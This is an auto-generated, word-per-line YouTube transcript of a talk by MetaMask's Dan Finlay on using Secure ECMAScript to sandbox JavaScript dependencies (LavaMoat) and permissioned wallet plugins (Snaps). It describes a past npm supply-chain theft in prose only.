►
From YouTube: Dan Finlay from MetaMask presenting SES
Description
SES is a JavaScript runtime library for running such third-party code safely inside a featherweight compartment. SES stands for Secure ECMAScript, where ECMAScript is the standards name for JavaScript. SES addresses JavaScript’s lack of security. SES supports practicing of the Principle of Least Authority (or POLA) so that the risk from most third-party code can be substantially reduced.
Learn about Metamask: https://metamask.io/
Learn about SES: https://github.com/Agoric/SES/
A
I
think
I'm
all
set
up:
okay,
hey
there,
I'm
Dan,
Finley
I'm
from
Etta
mask
and
I'm,
also
building
on
a
goreck,
secure,
ACMA
script
to
work,
and
you
know
I've
seen
a
lot
of
you
know.
Mark
comes
with
a
lot
of
proposals.
The
tc39
and
so
I'm
really
happy
to
have
some
members
from
there
here,
because
I'm
hoping
to
bring
a
little
practicality
like
how
it
affects
us
everyday
and
we've
got
a
pretty
pretty
unique
use
case.
A
That
puts
us
in
a
position
of
caring
a
lot
about
a
couple
of
the
features
that
this
this
has
so
so
meta
mask.
Just
of
so
I'll
introduce
myself
I'm
a
co-founder
of
meta.
Mask
I
worked
at
Apple
I've
been
doing
javascript
for,
like
seven
years,
I've
been
focusing
largely
on
meta
masks,
extensibility,
but
I'll
be
talking
about
two
things.
A
A
You
could
write
a
software
that
doesn't
have
anyone
who
could
subvert
it,
so
you
could
make
you
can
make
a
cooperative
where
the
voting
process
is
enforced
or
you
could
make
a
new
community
currency
or
you
know
there
were
you
know
our
imaginations
went
wild
and
we
tried
making
an
app
and
we
realized
that
the
the
fundamentals
of
logging
into
a
web
app
are
totally
broken
by
block
chains
because
block
chains.
There
is
no
registry
of
accounts.
A
There
are
no
secrets,
there's
just
your
cryptographic
keys
that
control
your
accounts,
so
we
needed
to
make
an
account
manager
that
was
client-side
was
gonna,
store
your
secrets
and
it
was
going
to
protect
those
secrets
from
all
the
hazardous
all
the
hazards
of
the
worlds
you
interacted
in.
In
my
version
of
JavaScript,
there
is
no
safe
code
right,
you're
you're,
going
you're,
bringing
your
money
you've
got
people
put
way
too
much
money
into
this
right.
A
In
JavaScript
and
and
there
and
we've
got
a
over
a
million
users
and
we've
got
a
lot
of
application
developers
and
a
lot
of
people
started
crowd
sales
and
started
funding
projects,
and
there
was
a
lot
of
excitement
and
enthusiasm,
and
really
we
saw
things
really
go
wild
in
2017,
and
you
know
things
have
been
maturing
a
little
bit.
We've
had
a
couple
years
of
incubation
people.
Okay,
we
know
we
can
crowdfund
really
rapidly,
but
can
we
do
it
well?
Can
we
do
it
carefully?
Can
we
do
it
sanely?
A
So
so
today,
what
we
are
is
we're,
basically
the
we're
kind
of
the
initial,
the
first
kind
of
dominant
account
manager
for
blockchain
applications,
so
it
from
a
technical
perspective
right
now,
it's
a
web
extension
and
a
mobile
browser.
We
provide
key
recovery
and
storage.
We
provide
an
API
to
website,
we
add
an
API
to
the
browser
and
we
let
you
just
generate
accounts
like
they
were
candy,
so
you
can
just
you
it's
fully
pseudonymous
and
we
had
these
payment
api's
and
you
can
interact
with
these
new
applications.
A
But
there
are
a
lot
of
unique
challenges
to
this
space
where
simultaneously
have
the
highest
security.
We've
got
the
security
of
a
bank,
but
we've
got
just
the
usability
of
no
one's
ever
thought
about
this
stuff
before
and
meanwhile,
the
technology
is
so
immature
that
we
actually
are
constantly
under
pressure
to
innovate.
So
so
we're
between
a
rock
and
a
hard
place.
We
need
to
innovate.
We
need
to
explore
new
protocols.
You
may
hear
a
lot.
People
say
block
chains,
don't
scale,
you
know,
will
it
ever
take
off
or
maybe
Facebook's
just
gonna?
A
You
know
squash
it
all
and
we're
always
just
gonna,
be
you
know
yeah,
so
we're
gonna
use
a
lot
of
space
bugs
yeah
so
but
I
mean
maybe
I,
but
but
can
these
things
scale
and
if
we're
gonna
make
them
scale,
we
need
to.
We
need
to
iterate
and
we
need
to
innovate.
So
can
we
can
we
provide
usability?
Can
we
experiment
with
extensibility
and
still
maintain
that
security
that
reckless
people
are
going
to
throw
into
our
code?
A
So,
in
short,
we've
got
a
lot
of
features
we
want
to
add,
but
we
have
to
preserve
our
security,
so
we
actually
have
to
this
inspired.
When
we
learned
about
a
gorks
work,
it
inspired
two
major
projects
within
our
organization.
One
is
called
lava,
moat
and
the
other
ones
we're
calling
snaps.
So
first
I'll
talk
about
lava
moat
and
it
has
implications
for
the
entire
I
think
JavaScript
ecosystem.
A
A
It
was
just
like
yeah
I
wrote
a
log,
color,
formatter
and
and
now
I'm,
just
reaping
tons
of
credit
cards,
and
you
know
I,
just
I
just
steal
everyone
out
of
100
accounts,
no
one
notices,
and
it's
so
plausible,
and-
and
you
know,
ok,
but
maybe
it's
sci-fi-
we
don't
know,
but
you
know
then,
the
next
year
a
major,
a
Bitcoin
wallet
got
hacked
in
the
exact
way
described
in
that
article.
In
this
case,
there
was
a
simple,
a
very
small
module,
just
a
stream
transform
the
event
stream
transform
and
the
maintainer.
A
You
know
he
wrote
it
as
an
experiment.
He
said
he's
a
you
know
a
code
Wizard,
he
was
making
all
sorts
of
interesting
modules
and
people
depend
millions
and
millions
of
people
depend
on
his
modules
every
day
and
he
wasn't
maintaining
this
one
anymore
and
some
when
some
intrepid
contributor
said,
oh
hey,
I
found
some
bugs
I'm
enhancing
the
documentation
he
gave
them
contributor
rights.
Why?
Wouldn't
he?
Because
this
is
a
project
he
didn't
care
about
anymore.
A
Well,
what
that
contributor
knew
is
that
this
little
tiny
stream
module
was
being
used
in
the
bitpay
Bitcoin
wallet,
and
so
they
were
able
to
undermine
the
build
process
of
that
Bitcoin
wallet
and
add
so
so
it
didn't.
It
didn't.
Even
look
like
there
was
a
problem,
but
when
you
built
it
now
it
inject
a
thing
so
so
that
now,
when,
when
their
keys
go
through
a
stream,
it
sends
them
up
to
their
home
base
and
they
soul
I
think
it
was
around
twelve
million
dollars.
That
way.
A
So
you
know
we're
we're
a
JavaScript
we're
JavaScript
wallet.
What
do
we
do
about
that?
So
we've
got
llama,
ignore
this
ID
and
decide
thing
on
the
side
for
a
sec.
It
is
a
JavaScript
build
transform.
So
first
it's
browserify,
it's
gonna
be
web
pack,
it's
actually
very
trivial
to
work
between
different
build
processes
and
it
puts
every
single
dependency
into
a
cess
container.
The
same
thing
you
saw
running
around
that
light
bulb.
A
We
put
every
dependency
in
it
like
we
just
don't
trust
it
at
all,
and
then
we
so
they
get
no
global
API.
They
get
no
it
permissions
by
default
and
all
of
those
permissions
that
they
do
get
are
constrained
by
a
config
file
that
we
generate
the
first
time
we
install
it.
So
so
here's
a
hypothetical
stream
HTTP.
You
know
we've
got
plenty
of
strength,
transform
modules
in
our
dependency
graph.
In
this
case
it
uses
a
number
of
Global's
and
you
can
see
actually
does
use
xml
httprequest,
which
is
one
of
those
and
fetch.
A
So
we
watch
those
ones
real
close.
So
this
this
would
be
a
sensitive
module
that
we
might
audit
more
closely.
But
but
the
module,
if
it's
just
transforming
a
stream,
we
would
give
it
none
of
those
things.
It
may
be
a
pure
function,
input
and
out,
and
we
now
can
trust
much
more
safely
that
that
that
dependency
isn't
the
thing
that's
going
to
be
stealing
our
keys
as
long
as
we're
running
this
transform
at
we're
not
running
scripts
at
install
time
in
our
build
process
and
at
run
time.
A
A
That
says
Oh
suddenly,
you
know
event
stream
wants
a
network
access
and
we
scratch
our
heads
and
we
might
read
the
source
code
and
say
like
what
is
that
very
long
opposite
gated
line,
and
so
it's
a
cool
static
analysis
tool
as
well
as
a
sandboxing
tool
or
confinement
tool
and
yeah.
So
we
get
that
visible
dip.
A
We
we
can't
guarantee
that
those
aren't
going
to
call
home,
but
now
we've
limited
the
critical
attack
surface
to
these
select
modules,
and
so
now
we
can
investigate
those
and-
and
you
know
for
any
one
of
them.
Now
the
you
know
a
green
module
if
they
would
want
to
hack
us,
they
would
have
to
they'd
have
to
both
subvert
the
dependency
tree
and
have
a
zero-day
on
the
assess
containment.
B
A
If
you
can't
tell
that's,
that
is
a
big,
a
big
graph,
and
this
is
a
yeah
it's
a
lot
of
dependencies,
but
welcome
to
JavaScript.
Okay,
yeah
I
mean
I
mean
you,
you
may
trust
your
origin,
but
that's
probably
because
you're
not
using
NPM
all
right
and
then-
and
now
here
is
here's
our
same
dependency
graph
running,
not
under
Cecily.
If
it
has
all
if
they
all,
if
we
don't
have
secure
ACMA
script,
if
we
don't
have
that
containment
that
any
single
one
of
these
modules
could
pollute
our
array
prototype
it.
Could
you.
A
Home
and
there's
just
a
million
ways
that
they
could
just
steal
everything.
So
so
we
just
massively
reduced
that.
Okay,
that
that's
one
of
the
ways
that
we
found
useful
too.
So
that
was
the
security
one
and
a
lot
of
people
don't
get
inspired
by
the
security
story.
They
say
no,
no.
We
really
can
secure
our
code
and
that's
fine.
If
that's,
if
that's
for
you,
so
be
it
but
there's
another
very
interesting
story:
we've
found
using
secure,
Ekman
script
because
we
also
are
constantly
being
pressed
to
innovate.
Cryptocurrency
is
moving
incredibly
fast.
A
We
are
an
aetherium
first
wallet,
but
there's
a
like
100
block
chains.
Right
now
and
and
there's
a
you
know,
a
thousand
scaling
strategies
and
every
single
one
of
them
comes
to
our
repo
and
they
say
they
say,
accept
our
pull
request.
Integrate
us
give
us
first-class
status,
you
know,
show
all
your
users
and
it's
it's
a
lot
of
pressure
and
we
we
have
to
audit
this
code
and
we
have
to
say-
and
now
we
feel
like
we're
picking
winners.
We
can't
read
all
the
white
papers.
How
do
we?
A
How
do
we
keep
ourselves
relevant
in
a
space
where
we're
trying
to
facilitate
creativity?
That
is
just
booming
right.
This
is
it.
People
are
saying
this
has
the
potential
to
rewrite
the
rules
of
finance
and
how
society
works,
and,
if
that's
the
case,
then
well
yeah,
then
all
that
funding
is
justified.
But
how
do
those
people
get
in
the
door
today?
Each
one
of
them
has
to
write
a
whole
wallet
from
scratch,
and
so
our
users,
they
could
come
to
us.
A
They
they
want
new
networks,
new
features,
scaling
strategies,
contract
accounts,
new
hosting
services,
hardware,
wallets,
cryptography,
etcetera,
like
I,
was
saying,
and
we
just
can't
merge
enough.
So
so
what
do
we
do?
We
start
constraining
contributions,
so
we've
written
a
little
bit
of
a
permissions
system.
So
at
we
added
to
the
API
that
we
provide
to
sites
we,
we
gave
a
way
of
requesting
permission
from
our
wallet,
but
the
most
interesting
permission
we
added
was
the
permission
to
run
a
script
which
itself
gets
permissions.
A
So
this
means
we
get
to
have
a
nice
pretty
little
prompt
when
somebody's
logging
in
with
our
with
our
system
and
they
yeah.
So
we
already
get
permissions,
and
now
we
have
the
ability
to
get
user
consent
to
further
delegate
those
permissions.
So
so
we're
you
know
we're
confined
as
a
web
extension,
but
now
we
can
further
confine
things
that
we
want.
So
through
delegation
and
yeah
yeah.
We
can
then
extend
for
it
and
we
can-
and
we
can
now
extend
api's
that
are
very
specific
to
what
a
new
cryptocurrency
wallet
means.
A
So
we're
pretty
sure
that
a
new
cryptocurrency
actually
only
needs
a
couple
things
from
us.
We've
done
all
the
groundwork
right.
We've
we've
got
the
user
backing
up
keys,
we've
we've
added
in
an
API
to
the
website.
They
basically
need.
Actually
the
next
slide
shows
it
about.
A
month
ago
we
did
a
hackathon
with
the
gorg.
They
mentioned
they're
doing
a
blockchain
as
our
hackathon
project.
We
used
this
plug-in
system
to
at
runtime
sign-in
to
a
site
where
we
added
their
blockchain
support
as
part
of
the
login
flow.
A
So
we
believe
this
is
the
first
time
that
someone
added
a
blockchain
support
to
a
wallet
at
runtime,
so
it's
very
similar
to
our
normal
login,
basically
they're
like
when
you're
logging.
We
think
we
can
make
this
one
permission
request,
but
basically
they
want
to
know
if
you
can
install
the
script
and
then
the
script
wants-
and
this
is
the
important
part-
it's
got
two
little
permissions.
It's
asking
for
permission
to
display
confirmations
for
user
action
and
display
custom
assets
in
your
wallet,
and
so
those
are
the
two.
A
When
we
talk
about
attenuating,
what
are
the?
What
are
the
functions?
You're
passing
to
this
untrusted
script,
to
us
support
for
another
blockchain.
There
would
also
be
network
support
there.
A
new
blockchain,
interacting
with
your
with
your
wallet
with
your
browser,
basically
needs
network
access.
They
just
want
to
list
an
asset
and
they
want
to
ask
user
consent.
A
So
those
three
things
now
we
make
three
functions
for
that:
we've
very
greatly
confined
it,
and
now
we
have
a
scalable
kind
of
permissionless,
blockchain
playground
and,
and
our
developer
community
is
seriously
going
nuts
about
it,
because
it's
previously
every
new
blockchain
needed
to
write
their
own
new
wallet,
their
own
new
account
manager
all
this
stuff.
Suddenly
they
just
have
to
write
a
little
script
that
just
describes
how
to
interact
with
it,
and
now
they
can
go
wild.
A
They
can
build
applications
so
we're
seeing
of
people
starting
to
build
new
networks
and
scalability
there's
you
can
write
smart
contract
accounts,
which
means
like
you,
don't
have
to
ask
somebody
else.
It's
a
two-factor
or
to
authenticate
you
can
like
have
a
social
network
recovery
or
we
saw
smart
will
there's
some
some
cool
things
like
that
new
kinds
of
privacy,
we're
yeah.
A
End
encryption
in
the
browser
yeah
new
security
enhancements,
bah
blah
yeah.
We
have
a
lot
of
enthusiasm.
Our
developers
have
been
like
rebirth
with
excitement.
This
is
like
a
part
of
our
platform
that
was
closed
before
blocked
by
PRS.
If
you
know
what
it's
like,
maintaining
a
very
contentious
github
repository,
then
you
might
be
able
to
appreciate
what
it's
like
when
you
can't.
Finally
tell
people
like.
A
Actually,
if
you
can
get
users
to
consent
to
a
couple
simple
permissions
like
it's:
it's
their
web
now
like
they
can
literally
add
API
to
the
browser
at
runtime
with
this.
So
it's
like
got
implications
a
little
bit
beyond
cryptocurrency
too
so
I'll
just
end
with
a
Mark
Miller
quote.
You
know
it's
been
driving
his
work
for
a
long
time
now,
if
you
reduce
the
risk
of
cooperation,
you
get
a
more
cooperative
world.
This
is
this:
is
all
about
software,
getting
fun
again
right
fun,
but
without
losing
that
the
gravity
of
what
we're
working
with.
A
So
you
know,
we
don't
know
that
any
of
us.
This
is
perfect,
you
know,
but
we
like
it
to
be.
We
understand
the
the
principles
that
make
this
exciting
to
us
and
that's
why
we
are
here
tc39,
basically
saying
like
facilitate
standards
that
make
it
safer
to
secure
and
isolate
JavaScript
and
a
lot
of
times.
It
does
mean
I
kind
of
listen
to.
You
know
I'm,
not
saying
unquestioningly,
but
if
you
understand
these
principles,
you
understand
a
lot
of
the
kind
of
guiding
you
know
thrust.
A
A
B
B
A
Big
is
our
developer
community.
We
lost
track
a
long
time
ago.
You
know
in
2017,
I
I
could
tell
you
how
how
many
developers
there
are
I,
I,
think
weekly
actives,
which
are
honestly
mostly
developers
it's
around
45,000,
so
maybe
we'll
say
like
20,000,
but
but
yeah.
It's
a
and
yeah
we've
seen
a
lot
of
renewed
interest.
You
know
people
got
kind
of.
It
was
feeling
a
little
bit
stuck.
A
You
know
if
you're,
because
people
knew
a
theorem
wasn't
scaling
yet
you
know
we're
waiting
for
a
theorem
to,
but
when
we
suddenly
say
well
how
about
all
of
those
alternative
token
protocols
and
all
those
other
ideas
you
had
when
we
give
them
away
and
so
yeah
I
think
it.
This
is
gonna
be
an
exciting
year
for
for
them,
and
hopefully
others
yeah.
A
Yes,
so
that's:
how
do
we
figure
out
during
in
the
lava
moat,
build
process?
How
do
we
know
what
api's
are
used
by
each
package?
So
it
is
a
static
analysis
right.
So
it's
obviously
not
perfect,
but
here's.
The
good
news
is
because
we're
only
permitting
access
to
things
that
we
explicitly
list
in
that
config.
A
If
some
module
was
being
sneaky
and
obfuscating
the
things
it
was
using
it
would,
it
would
fail
by
not
gaining
access
to
that
thing,
so
so
it
that
config
file
yeah
it
restricts
and
only
allows
access
to
the
things
explicitly
listed,
and
so
we
make
our
best
guess
so
far
it's
been
good,
we've
gotten
most
of
our
dependencies
in
it.
You
know
we're
it's
in
progress
right
now,
but
yeah
yep,
good
yeah.
A
No
right
now
are
we
using
the
excess
engine,
or
are
we
using
v8
or
something
right
now,
both
of
those
are
in
beta,
so
neither
of
those
are
in
production
right
now,
and
so
we
are
using
the
realms
shim,
and
you
know
there
there
were
vulnerable
''tis
found
in
in
the
last
few
months
right.
So
we
know
that
a
JavaScript
based
containment
is
not
the
perfect
solution.
That's
why
it's
critical
that
this
gets
adopted
by
by
the
runtimes
themselves,
because
you
can't
be
like
a
native
enforcement
of
these
policies.
B
B
A
Right
so
right
it's
this
is
this
is
a
way
of
experimenting
with
what
could
be
and-
and
it
is
it's
JavaScript
and
and
if
we
do
it
right,
it'll
be
secure
and
it's
so
much
more
fun
to
play
in
a
secure
language
where
you
can
just
like
link
your
code
together
and
have
very,
very
explicit
guarantees
about
what
the
other
can
do.
It
makes
it
makes
the
cooperation
much
cheaper,
yep,
any
other
yeah
yeah,
pretty
simple
Thanks.